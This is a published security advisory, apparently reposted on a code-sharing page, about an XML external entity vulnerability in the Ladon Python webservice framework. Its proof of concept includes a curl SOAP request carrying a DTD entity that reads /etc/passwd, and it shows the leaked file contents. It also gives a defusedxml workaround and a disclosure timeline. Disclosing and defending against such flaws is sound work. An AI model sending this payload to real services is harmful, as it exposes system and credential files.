扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 |
Advisory: XML External Entity Expansion in Ladon Webservice Attackers who can send SOAP messages to a Ladon webservice via the HTTP interface of the Ladon webservice can exploit an XML external entity expansion vulnerability and read local files, forge server side requests or overload the service with exponentially growing memory payloads. Details ======= Product: Ladon Framework for Python Affected Versions: 0.9.40 and previous Fixed Versions: none Vulnerability Type: XML External Entity Expansion Security Risk: high Vendor URL: http://ladonize.org Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-008 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ "Ladon is a framework for exposing methods to several Internet service protocols. Once a method is ladonized it is automatically served through all the interfaces that your ladon installation contains. Ladon's interface implemetations are added in a modular fashion making it very easy [sic] extend Ladon's protocol support. Ladon runs on all Major OS's[sic] (Windows, Mac and Linux) and supports both Python 2 and 3." From the vendor's website[1] More Details ============ Ladon allows developers to expose functions of a class via different webservice protocols by using the @ladonize decorator in Python. By using the WSGI interface of a webserver or by running the Ladon command line tool "ladon-2.7-ctl" with the command "testserve" and the name of the Python file, the webservices can be accessed via HTTP. As a simple example, the following Python file "helloservice.py" was implemented: ------------------------------------------------------------------------ from ladon.ladonizer import ladonize class HelloService(object): @ladonize(unicode, rtype=unicode) def sayhello(self, uid): return u"Hello {0}".format(uid) ------------------------------------------------------------------------ This function can then be run as a ladon webservice via the following command: ------------------------------------------------------------------------ ladon-2.7-ctl testserve helloservice.py -p 8000 ------------------------------------------------------------------------ This enables access to the "sayhello"-function via SOAP- and JSON-APIs. The following command will send an HTTP SOAP request, which will trigger the function: ------------------------------------------------------------------------ curl -s -X $'POST' \ -H $'Content-Type: text/xml;charset=UTF-8' \ -H $'SOAPAction: \"http://localhost:8888/HelloService/soap11/sayhello\"' \ --data-binary $'<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:HelloService\"><soapenv:Header/><soapenv:Body> <urn:sayhello soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"> <uid xsi:type=\"xsd:string\">RedTeam Pentesting</uid> </urn:sayhello></soapenv:Body></soapenv:Envelope>' \ 'http://localhost:8888/HelloService/soap11' | xmllint --format - ------------------------------------------------------------------------ This will generate the following output: ------------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:HelloService" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <ns:sayhelloResponse> <result>Hello RedTeam Pentesting</result> </ns:sayhelloResponse> </SOAP-ENV:Body> </SOAP-ENV:Envelope> ------------------------------------------------------------------------ The SOAP-API of this service is susceptible to an XML external entity expansion. Proof of Concept ================ By including a DTD in the XML SOAP request, attackers are able to include external entities in the response of the server. In the case of the simple service the inclusion of the following DTD will result in the exposure of the "/etc/passwd"-file on the server: ------------------------------------------------------------------------ <?xml version="1.0"?> <!DOCTYPE uid [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> ------------------------------------------------------------------------ The following command exploits this vulnerability by including the &passwd; entity as the username in the request: ------------------------------------------------------------------------ curl -s -X $'POST' \ -H $'Content-Type: text/xml;charset=UTF-8' \ -H $'SOAPAction: \"http://localhost:8888/HelloService/soap11/sayhello\"' \ --data-binary $'<?xml version="1.0"?> <!DOCTYPE uid [<!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:HelloService\"><soapenv:Header/> <soapenv:Body> <urn:sayhello soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"> <uid xsi:type=\"xsd:string\">&passwd;</uid> </urn:sayhello> </soapenv:Body> </soapenv:Envelope>' \ 'http://localhost:8888/HelloService/soap11' | xmllint --format - ------------------------------------------------------------------------ The server answers with a response containing the passwd-file: ------------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:HelloService" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <ns:sayhelloResponse> <result>Hello root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:[...]</result> </ns:sayhelloResponse> </SOAP-ENV:Body> </SOAP-ENV:Envelope> ------------------------------------------------------------------------ Workaround ========== The Python package defusedxml [2] can be used to monkey patch the code to prevent XML vulnerabilities.The following workaround can be included in the code, which prevents exploitation: ------------------------------------------------------------------------ [...] import defusedxml defusedxml.defuse_stdlib() [...] ------------------------------------------------------------------------ Fix === Currently no fix is available. Security Risk ============= Attackers are able to read local files on the server of the webservice with the privileges of the webservice. Furthermore, attackers are able to create HTTP request from the webservice to other services on the Internet or the local network. It is likely that attackers are able to gain access to credentials for database services used by the webservice. Attackers may also be able to cause a denial-of-service attack against the respective webservice. Depending on the data stored on the vulnerable system and the relevance of the webservice, this vulnerability may pose a high risk. Timeline ======== 2016-11-29 Vulnerability identified 2016-11-29 Customer notified vendor 2017-07-10 Customer fixed problem in their own product 2017-07-21 RedTeam Pentesting notified vendor 2017-08-11 RedTeam Pentesting asked vendor for status update 2017-09-08 RedTeam Pentesting asked vendor for status update and announced public release for end of October 2017-10-09 RedTeam Pentesting asked vendor for status update 2017-11-03 Advisory released (no reply from vendor to status update requests) References ========== [1] http://ladonize.org [2] https://pypi.python.org/pypi/defusedxml RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting GmbH is looking for more penetration testers to join our team. If you are interested in working for RedTeam Pentesting in Aachen, please visit the respective section of our website. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschaftsfuhrer: Patrick Hof, Jens Liebchen |
体验盒子
